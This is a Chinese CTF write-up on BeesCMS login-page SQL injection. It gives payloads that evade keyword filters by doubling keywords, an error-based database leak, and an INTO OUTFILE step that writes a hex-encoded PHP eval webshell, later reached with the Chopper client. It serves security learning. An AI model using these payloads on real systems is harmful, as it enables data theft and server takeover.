CTF-BeesCMS系统漏洞分析溯源

根据题意

漏洞原因：因为BeesCMS后台登陆页面存在sql注入，可以被用来写入一句话木马或者查看管理员密码
进入环境，通过御剑工具扫描网站目录，发现/admin/login.php

首先在用户名 中 输入 ‘ 出现了报错， 确认后台登陆页面的user 有存在sql注入。
然后输入 ‘ or 1=1 # 就返回了正常的登陆失败的页面。
sql 回显可以看出有五个字段 所以尝试 ‘ union select 1,2,3,4,5 #
但是发现 union 和 select 好像都被过滤了，所以首先尝试复写绕过 uniunionon selselectect
然后发现 select 是可以的 union似乎有点不一样 直接返回了 ununionion 所以试试空格 un union ion
这样是ok的，发现会返回正常的登陆错误的页面了
admin ‘ un union ion seselectlect 1,2,3,4,5 #
既然已经知到闭合结构了 所以开始注入
这里可以发现 注入失败的时候是有回显的 所以我先用报错注入试了一下 发现是可以的 爆出当前数据库
admin ’ a and nd extractvalue(1,concat(1,database()))#

绕过限制写入文件的注入代码：
Admin’un union ion seselectlect 1,2,3,4,5 in into outoutfilefile ‘/var/www/html/shell.php’#

查看源码发现’<’和’>’被做了过滤，尝试url编码绕过失败
使用16进制绕过，将一句话木马进行16进制编码
将一句话木马修改为16进制，同时前面加上0x，这种方法也可以用在sql注入传参时引号被限制的情况的绕过注入代码：
admin’un union ion seselectlect 1,0x3c3f70687020406576616c28245f504f53545b27636d64275d293b203f3e,3,4,5 in into outoutfilefile ‘/var/www/html/shell2.php’#
发送
开启菜刀连接，获得key